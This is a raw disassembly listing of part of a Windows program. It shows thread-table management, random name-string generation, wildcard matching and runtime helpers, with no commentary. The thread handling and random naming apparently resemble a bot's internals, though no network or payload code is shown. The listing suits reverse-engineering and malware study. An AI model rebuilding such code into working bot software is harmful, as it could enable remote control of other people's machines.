; sub_404D6D+90�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404330
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 1
pop edi
mov [ebp+var_20], edi
xor ebx, ebx
loc_409638: ; CODE XREF: sub_40960A+10B�j
cmp edi, 0Fh
jge loc_4096F8
lea esi, [edi+edi*2]
shl esi, 3
cmp ds:dword_409D60[esi], ebx
jnz loc_409711
mov [ebp+var_4], ebx
push 4
push ebx
call sub_409A96 ; realloc
pop ecx
pop ecx
mov ds:dword_409D64[esi], eax
lea eax, [ebp+var_1C]
push eax
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
push ebx
call dword_4010B8 ; CreateThread
mov ds:dword_409D64[esi], eax
mov esi, [ebp+arg_8]
cmp esi, 3
jz short loc_4096B8
cmp esi, ebx
jnz short loc_40968F
push 0FFFFFFF1h
jmp short loc_4096B1
; ---------------------------------------------------------------------------
loc_40968F: ; CODE XREF: sub_40960A+7F�j
cmp esi, 1
jnz short loc_409698
push 0FFFFFFFEh
jmp short loc_4096B1
; ---------------------------------------------------------------------------
loc_409698: ; CODE XREF: sub_40960A+88�j
cmp esi, 2
jnz short loc_4096A1
push 0FFFFFFFFh
jmp short loc_4096B1
; ---------------------------------------------------------------------------
loc_4096A1: ; CODE XREF: sub_40960A+91�j
cmp esi, 4
jnz short loc_4096AA
push 1
jmp short loc_4096B1
; ---------------------------------------------------------------------------
loc_4096AA: ; CODE XREF: sub_40960A+9A�j
cmp esi, 5
jnz short loc_4096B8
push 2
loc_4096B1: ; CODE XREF: sub_40960A+83�j
; sub_40960A+8C�j ...
push eax
call dword_401038 ; SetThreadPriority
loc_4096B8: ; CODE XREF: sub_40960A+7B�j
; sub_40960A+A3�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4096D1
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor ebx, ebx
mov esi, [ebp+arg_8]
mov edi, [ebp+var_20]
loc_4096D1: ; CODE XREF: sub_40960A+B2�j
lea eax, [edi+edi*2]
shl eax, 3
cmp ds:dword_409D64[eax], ebx
jnz short loc_4096E3
xor eax, eax
jmp short loc_409702
; ---------------------------------------------------------------------------
loc_4096E3: ; CODE XREF: sub_40960A+D3�j
mov ecx, [ebp+arg_C]
mov ds:dword_409D60[eax], ecx
mov ds:dword_409D70[eax], edi
mov ds:dword_409D74[eax], esi
loc_4096F8: ; CODE XREF: sub_40960A+31�j
lea eax, [edi+edi*2]
mov eax, ds:dword_409D64[eax*8]
loc_409702: ; CODE XREF: sub_40960A+D7�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409711: ; CODE XREF: sub_40960A+43�j
inc edi
mov [ebp+var_20], edi
jmp loc_409638
sub_40960A endp
; =============== S U B R O U T I N E =======================================
sub_40971A proc near ; CODE XREF: sub_404360+69C�p
; code:0040757D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jle short locret_409782
cmp eax, 0Fh
jge short locret_409782
push ebx
push esi
lea esi, [eax+eax*2]
push edi
shl esi, 3
push ds:dword_409D68[esi]
lea edi, dword_409D68[esi]
call sub_40867A
xor ebx, ebx
mov [edi], ebx
push ds:dword_409D6C[esi]
lea edi, dword_409D6C[esi]
call sub_40867A
pop ecx
mov [edi], ebx
mov ds:dword_409D60[esi], ebx
lea eax, dword_409D64[esi]
pop ecx
mov ds:dword_409D74[esi], ebx
mov ds:dword_409D70[esi], ebx
mov ecx, [eax]
push ebx
push ecx
mov [eax], ebx
call dword_401090 ; TerminateThread
pop edi
pop esi
pop ebx
locret_409782: ; CODE XREF: sub_40971A+7�j
; sub_40971A+C�j
retn
sub_40971A endp
; =============== S U B R O U T I N E =======================================
sub_409783 proc near ; CODE XREF: sub_404360+3BC�p
; sub_404360+634�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop edi
mov esi, offset dword_409D78
loc_409790: ; CODE XREF: sub_409783+2D�j
mov eax, [esi]
test eax, eax
jz short loc_4097BE
push [esp+0Ch+arg_0]
push eax
call sub_409A3E ; _stricmp
pop ecx
test eax, eax
pop ecx
jz short loc_4097B4
add esi, 18h
inc edi
cmp esi, offset byte_409EC8
jl short loc_409790
jmp short loc_4097BE
; ---------------------------------------------------------------------------
loc_4097B4: ; CODE XREF: sub_409783+21�j
lea eax, [edi+edi*2]
mov ebx, ds:dword_409D70[eax*8]
loc_4097BE: ; CODE XREF: sub_409783+11�j
; sub_409783+2F�j
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_409783 endp
; =============== S U B R O U T I N E =======================================
sub_4097C4 proc near ; CODE XREF: sub_408EAE+6A�p
arg_0 = dword ptr 4
push offset dword_404288
push [esp+4+arg_0]
call sub_409ADE ; fopen
pop ecx
test eax, eax
pop ecx
jnz short loc_4097DB
xor al, al
retn
; ---------------------------------------------------------------------------
loc_4097DB: ; CODE XREF: sub_4097C4+12�j
push eax
call sub_409AD2 ; fclose
pop ecx
mov al, 1
retn
sub_4097C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097E5 proc near ; CODE XREF: sub_4098BE+85�p
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 8
call sub_409A9C ; malloc
push 8
push 0
push eax
mov [ebp+var_C], eax
call sub_409AB4 ; memset
add esp, 10h
call sub_409AC6 ; rand
push 1Ah
mov esi, offset a0123456789abcd ; "0123456789abcdefghijklmnopqrstuvwxyz"
cdq
pop ecx
lea edi, [ebp+var_34]
idiv ecx
push 9
pop ecx
rep movsd
movsb
mov ebx, edx
add bl, 61h
call sub_409AC6 ; rand
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_5], al
call sub_409AC6 ; rand
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_4], al
call sub_409AC6 ; rand
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_3], al
call sub_409AC6 ; rand
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_2], al
call sub_409AC6 ; rand
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_1], al
call sub_409AC6 ; rand
cdq
idiv esi
movsx eax, [ebp+edx+var_34]
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, bl
push eax
push offset aCCCCCCC ; "%c%c%c%c%c%c%c"
push [ebp+var_C]
call sub_409AC0 ; sprintf
mov eax, [ebp+var_C]
add esp, 24h
pop edi
pop esi
pop ebx
leave
retn
sub_4097E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098BE proc near ; CODE XREF: sub_404E76+2C�p
; code:00405345�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404340
push offset sub_409A50
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov edi, [ebp+arg_0]
lea esi, [edi+1]
push esi
call sub_409A9C ; malloc
mov ebx, eax
mov [ebp+var_1C], ebx
push esi
push 0
push ebx
call sub_409AB4 ; memset
add esp, 10h
and [ebp+var_24], 0
loc_409909: ; CODE XREF: sub_4098BE+70�j
cmp [ebp+var_24], edi
jge short loc_409930
call sub_409AC6 ; rand
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov [ebp+var_20], edx
lea eax, [ebp+var_20]
push eax
push ebx
call sub_409B14 ; strcat
pop ecx
pop ecx
inc [ebp+var_24]
jmp short loc_409909
; ---------------------------------------------------------------------------
loc_409930: ; CODE XREF: sub_4098BE+4E�j
or [ebp+var_4], 0FFFFFFFFh
mov eax, ebx
jmp short loc_409948
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
call sub_4097E5
loc_409948: ; CODE XREF: sub_4098BE+78�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4098BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409957 proc near ; CODE XREF: sub_404360+3DF�p
; sub_404E76+26�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call dword_401080 ; GetTickCount
push eax
call sub_409B0E ; srand
pop ecx
call sub_409AC6 ; rand
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
inc eax
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_404350
call sub_409A90 ; _ftol
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_409957 endp
; =============== S U B R O U T I N E =======================================
sub_409995 proc near ; CODE XREF: sub_40785C:loc_4078E3�p
push esi
call sub_409AC6 ; rand
mov esi, eax
shl esi, 10h
call sub_409AC6 ; rand
add eax, esi
pop esi
retn
sub_409995 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4099A9 proc near ; CODE XREF: sub_40785C+C4�p
jmp sub_409AC6
sub_4099A9 endp
; =============== S U B R O U T I N E =======================================
sub_4099AE proc near ; CODE XREF: code:004051FF�p
; code:004052B5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_4099B8: ; CODE XREF: sub_4099AE+1B�j
; sub_4099AE+44�j
mov al, [esi]
test al, al
jnz short loc_4099CB
mov al, [ecx]
test al, al
jz short loc_4099F4
cmp al, 2Ah
jnz short loc_409A14
inc ecx
jmp short loc_4099B8
; ---------------------------------------------------------------------------
loc_4099CB: ; CODE XREF: sub_4099AE+E�j
mov dl, [ecx]
test dl, dl
jz short loc_409A14
cmp al, dl
jz short loc_4099F0
cmp al, 41h
jl short loc_4099DD
cmp al, 5Ah
jle short loc_4099E5
loc_4099DD: ; CODE XREF: sub_4099AE+29�j
cmp al, 61h
jl short loc_4099EB
cmp al, 7Ah
jg short loc_4099EB
loc_4099E5: ; CODE XREF: sub_4099AE+2D�j
xor al, 20h
cmp al, dl
jz short loc_4099F0
loc_4099EB: ; CODE XREF: sub_4099AE+31�j
; sub_4099AE+35�j
cmp dl, 3Fh
jnz short loc_4099F8
loc_4099F0: ; CODE XREF: sub_4099AE+25�j
; sub_4099AE+3B�j
inc ecx
inc esi
jmp short loc_4099B8
; ---------------------------------------------------------------------------
loc_4099F4: ; CODE XREF: sub_4099AE+14�j
; sub_4099AE+5D�j
mov al, 1
jmp short loc_409A16
; ---------------------------------------------------------------------------
loc_4099F8: ; CODE XREF: sub_4099AE+40�j
cmp byte ptr [ecx], 2Ah
jnz short loc_409A14
lea edi, [ecx+1]
loc_409A00: ; CODE XREF: sub_4099AE+64�j
push edi
push esi
call sub_4099AE
pop ecx
test al, al
pop ecx
jnz short loc_4099F4
cmp [esi], al
jz short loc_409A14
inc esi
jmp short loc_409A00
; ---------------------------------------------------------------------------
loc_409A14: ; CODE XREF: sub_4099AE+18�j
; sub_4099AE+21�j ...
xor al, al
loc_409A16: ; CODE XREF: sub_4099AE+48�j
pop edi
pop esi
retn
sub_4099AE endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A1A proc near ; CODE XREF: sub_404360+74B�p
; sub_404360+77F�p
jmp dword_401104
sub_409A1A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A20 proc near ; CODE XREF: sub_404360+516�p
; sub_404C8D+B9�p ...
jmp dword_401140
sub_409A20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A26 proc near ; CODE XREF: sub_404360+501�p
; sub_404360+6FD�p ...
jmp dword_40113C
sub_409A26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A2C proc near ; CODE XREF: sub_404360+4D2�p
; sub_404360+4DB�p ...
jmp dword_401138
sub_409A2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A32 proc near ; CODE XREF: sub_404360+4B4�p
; code:00404F2F�p ...
jmp dword_401134
sub_409A32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A38 proc near ; CODE XREF: sub_404360+423�p
; sub_404360+552�p ...
jmp dword_401130
sub_409A38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A3E proc near ; CODE XREF: sub_404360+7B�p
; sub_404360+A5�p ...
jmp dword_40112C
sub_409A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A44 proc near ; CODE XREF: sub_404360+3A�p
; sub_404360+59�p ...
jmp dword_401128
sub_409A44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A50 proc near ; DATA XREF: sub_404360+A�o
; sub_404C8D+A�o ...
jmp dword_401124
sub_409A50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409A60 proc near ; CODE XREF: sub_404360+494�p
; code:00404F0A�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_409A80
loc_409A6C: ; CODE XREF: sub_409A60+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_409A6C
loc_409A80: ; CODE XREF: sub_409A60+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_409A60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A90 proc near ; CODE XREF: sub_404360+2ED�p
; sub_404360+2F3�p ...
jmp dword_401120
sub_409A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A96 proc near ; CODE XREF: sub_40960A+4F�p
jmp dword_40111C
sub_409A96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409A9C proc near ; CODE XREF: sub_4063B3+A�p
; sub_4063ED+12�p ...
jmp dword_401118
sub_409A9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AA2 proc near ; CODE XREF: sub_404C8D+8D�p
; sub_404D6D+A8�p ...
jmp dword_401114
sub_409AA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AA8 proc near ; CODE XREF: sub_404C8D+45�p
jmp dword_401110
sub_409AA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AAE proc near ; CODE XREF: code:00405248�p
; code:004079C8�p ...
jmp dword_401108
sub_409AAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AB4 proc near ; CODE XREF: code:0040514D�p
; code:0040515C�p ...
jmp dword_401100
sub_409AB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409ABA proc near ; CODE XREF: code:004054CC�p
; code:004054DF�p ...
jmp dword_4010FC
sub_409ABA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AC0 proc near ; CODE XREF: sub_405D60+62�p
; code:004071EF�p ...
jmp dword_4010F8
sub_409AC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AC6 proc near ; CODE XREF: sub_407381+1�p
; sub_407381+B�p ...
jmp dword_4010F4
sub_409AC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409ACC proc near ; CODE XREF: code:00407780�p
jmp dword_4010F0
sub_409ACC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AD2 proc near ; CODE XREF: code:00407AB7�p
; sub_407F03+81�p ...
jmp dword_4010EC
sub_409AD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AD8 proc near ; CODE XREF: code:00407A1F�p
; code:00407A4F�p ...
jmp dword_4010E8
sub_409AD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409ADE proc near ; CODE XREF: code:004079F9�p
; code:00407C5E�p ...
jmp dword_40110C
sub_409ADE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AE4 proc near ; CODE XREF: code:00407D4E�p
; code:00407E11�p
jmp dword_4010E0
sub_409AE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AEA proc near ; CODE XREF: text:00408436�p
jmp dword_4010DC
sub_409AEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AF0 proc near ; CODE XREF: text:00408256�p
; text:0040827B�p ...
jmp dword_4010D8
sub_409AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AF6 proc near ; CODE XREF: text:00408245�p
; text:004083DE�p
jmp dword_4010D4
sub_409AF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409AFC proc near ; CODE XREF: sub_408691+23�p
jmp dword_4010D0
sub_409AFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409B02 proc near ; CODE XREF: sub_408691+11�p
jmp dword_4010CC
sub_409B02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409B08 proc near ; CODE XREF: sub_40870A+163�p
jmp dword_4010C8
sub_409B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409B0E proc near ; CODE XREF: sub_409022+167�p
; sub_409957+C�p
jmp dword_4010C4
sub_409B0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409B14 proc near ; CODE XREF: sub_4098BE+66�p
jmp dword_4010C0
sub_409B14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409B20 proc near ; CODE XREF: sub_409314+4D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_409B41
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_409B91
; ---------------------------------------------------------------------------
loc_409B41: ; CODE XREF: sub_409B20+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_409B4F: ; CODE XREF: sub_409B20+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_409B4F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_409B7A
cmp edx, [esp+4+arg_4]
ja short loc_409B7A
jb short loc_409B82
cmp eax, [esp+4+arg_0]
jbe short loc_409B82
loc_409B7A: ; CODE XREF: sub_409B20+4A�j
; sub_409B20+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_409B82: ; CODE XREF: sub_409B20+52�j
; sub_409B20+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_409B91: ; CODE XREF: sub_409B20+1F�j
pop ebx
retn 10h
sub_409B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409BA0 proc near ; CODE XREF: sub_409314+29�p
; sub_409314+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_409BC2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_409C03
; ---------------------------------------------------------------------------
loc_409BC2: ; CODE XREF: sub_409BA0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_409BD0: ; CODE XREF: sub_409BA0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_409BD0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_409BFE
cmp edx, [esp+8+arg_4]
ja short loc_409BFE
jb short loc_409BFF
cmp eax, [esp+8+arg_0]
jbe short loc_409BFF
loc_409BFE: ; CODE XREF: sub_409BA0+4E�j
; sub_409BA0+54�j
dec esi
loc_409BFF: ; CODE XREF: sub_409BA0+56�j
; sub_409BA0+5C�j
xor edx, edx
mov eax, esi
loc_409C03: ; CODE XREF: sub_409BA0+20�j
pop esi
pop ebx
retn 10h
sub_409BA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409C08 proc near ; CODE XREF: sub_4093DC+56�p
jmp dword_4010E4
sub_409C08 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_409C10 proc near ; CODE XREF: sub_4093DC+43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_409C31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_409C31: ; CODE XREF: sub_409C10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_409C4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_409C4D: ; CODE XREF: sub_409C10+27�j
or eax, eax
jnz short loc_409C69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_409CAA
; ---------------------------------------------------------------------------
loc_409C69: ; CODE XREF: sub_409C10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_409C77: ; CODE XREF: sub_409C10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_409C77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_409CA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_409CA5
jb short loc_409CA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_409CA6
loc_409CA5: ; CODE XREF: sub_409C10+85�j
; sub_409C10+8B�j
dec esi
loc_409CA6: ; CODE XREF: sub_409C10+8D�j
; sub_409C10+93�j
xor edx, edx
mov eax, esi
loc_409CAA: ; CODE XREF: sub_409C10+57�j
dec edi
jnz short loc_409CB4
neg edx
neg eax
sbb edx, 0
loc_409CB4: ; CODE XREF: sub_409C10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_409C10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CBA proc near ; CODE XREF: code:004072D6�p
; code:00407343�p ...
jmp dword_401158
sub_409CBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CC0 proc near ; CODE XREF: code:004072C7�p
; code:0040730E�p
jmp dword_401154
sub_409CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CC6 proc near ; CODE XREF: code:0040722B�p
; code:004072E2�p
jmp dword_40115C
sub_409CC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CCC proc near ; CODE XREF: code:0040721F�p
jmp dword_401150
sub_409CCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CD2 proc near ; CODE XREF: code:0040718B�p
jmp dword_40114C
sub_409CD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CD8 proc near ; CODE XREF: code:0040716E�p
; code:004071A5�p
jmp dword_401148
sub_409CD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_409CDE proc near ; CODE XREF: sub_406983+5E�p
; text:004080CB�p
jmp dword_4011C0
sub_409CDE endp
; ---------------------------------------------------------------------------
align 10h
byte_409CF0 db 0 ; DATA XREF: code:off_4016D0�o
; code:0040713B�r ...
align 4
dword_409CF4 dd 2 dup(0) dword_409CFC dd 0 dword_409D00 dd 6 dup(0) ; code:loc_407602�o
dword_409D18 dd 0 ; sub_407EAB+44�r ...
align 10h
dword_409D20 dd 0 ; sub_408C39+18�w ...
dword_409D24 dd 0 ; sub_408C39+6A�w ...
dword_409D28 dd 0 ; sub_408C39+FD�w
dword_409D2C dd 0 dword_409D30 dd 0 dword_409D34 dd 0 dword_409D38 dd 0 dword_409D3C dd 0 ; sub_408C39+52�w ...
dword_409D40 dd 0 ; sub_408C39+C6�r ...
align 8
dword_409D48 dd 0 ; sub_404360+6A1�r ...
align 10h
word_409D50 dw 0 ; DATA XREF: sub_404360+134�r
; code:00407291�r ...
align 10h
dword_409D60 dd 0 ; sub_40960A+DC�w ...
dword_409D64 dd 0 ; sub_40960A+6F�w ...
dword_409D68 dd 0 ; code:00407B12�r ...
dword_409D6C dd 0 ; code:00407B6D�r ...
dword_409D70 dd 0 ; sub_40971A+53�w ...
dword_409D74 dd 0 ; sub_40971A+4D�w
dword_409D78 dd 54h dup(0) byte_409EC8 db 0 ; DATA XREF: sub_404360+1AF�w
; sub_404E76+42�w ...
align 4
dword_409ECC dd 0 ; sub_404360+13C�r ...
byte_409ED0 db 0 ; DATA XREF: sub_404360+683�w
; code:loc_40758C�w ...
align 2
word_409ED2 dw 0 ; DATA XREF: sub_404360+7E0�r
; code:004053D9�r ...
dword_409ED4 dd 5 dup(0) dword_409EE8 dd 0 ; sub_404360:loc_4048A7�w ...
word_409EEC dw 0 ; DATA XREF: sub_404360+3F5�w
; sub_404360:loc_404761�r ...
align 10h
dword_409EF0 dd 0 ; sub_404360+42F�w
dword_409EF4 dd 0 dword_409EF8 dd 0 dword_409EFC dd 0 ; sub_404360:loc_40491A�w ...
dword_409F00 dd 0 ; sub_404360+596�w
byte_409F04 db 0 ; DATA XREF: sub_404360+5E0�w
; sub_404360+600�w
align 4
dword_409F08 dd 0 ; text:004084D6�w ...
byte_409F0C db 0 ; DATA XREF: sub_404D6D:loc_404E6A�w
; sub_404E76:loc_404E79�r ...
align 10h
dword_409F10 dd 0 ; sub_404E76+37�w ...
dword_409F14 dd 0 ; sub_404C8D+75�w
dword_409F18 dd 0 ; sub_404C8D+7D�r ...
dword_409F1C dd 23h dup(0) dword_409FA8 dd 41h dup(0) dword_40A0AC dd 24h dup(0) dd 0A79Eh, 4 dup(0)
dd 0A8F2h, 4 dup(0)
dd 0A52Ch, 4 dup(0)
dd 0A900h, 4 dup(0)
dd 0A7E2h, 4 dup(0)
dd 0A9C4h, 4 dup(0)
dd 0A9EAh, 6 dup(0)
dd 0A868h, 0A856h, 0A844h, 0A836h, 0A826h, 0A814h, 0A804h
dd 0A7EEh, 0A878h, 0A890h, 0A8A2h, 0A8B6h, 0A8D4h, 0
dd 0A77Ah, 0A764h, 0A754h, 0A73Ah, 0A71Eh, 0A70Eh, 0A6F8h
dd 0A6ECh, 0A6E0h, 0A6D4h, 0A6C4h, 0A6B8h, 0A6A2h, 0A68Ch
dd 0A670h, 0A660h, 0A64Ah, 0A538h, 0A540h, 0A550h, 0A55Eh
dd 0A56Ch, 0A584h, 0A596h, 0A5AEh, 0A5D6h, 0A5EEh, 0A604h
dd 0A612h, 0A620h, 0A62Ah, 0A63Ah, 0A78Eh, 0
dd 0A51Ah, 0A512h, 0A508h, 0A4FCh, 0A4F2h, 0A4E8h, 0A4DEh
dd 0A4D4h, 0A4CCh, 0A524h, 0A4BCh, 0A4B2h, 0A4A2h, 0A49Ah
dd 0A490h, 0A486h, 0A47Ch, 0A3DCh, 0A472h, 0A4C4h, 0A466h
dd 0A45Ch, 0A452h, 0A448h, 0A440h, 0A42Ch, 0A422h, 0A416h
dd 0A40Eh, 0A404h, 0A3FAh, 0A3EEh, 0A3E6h, 0
dd 80000018h, 8000004Bh, 80000029h, 8000000Bh, 8000001Fh
dd 80000003h, 0
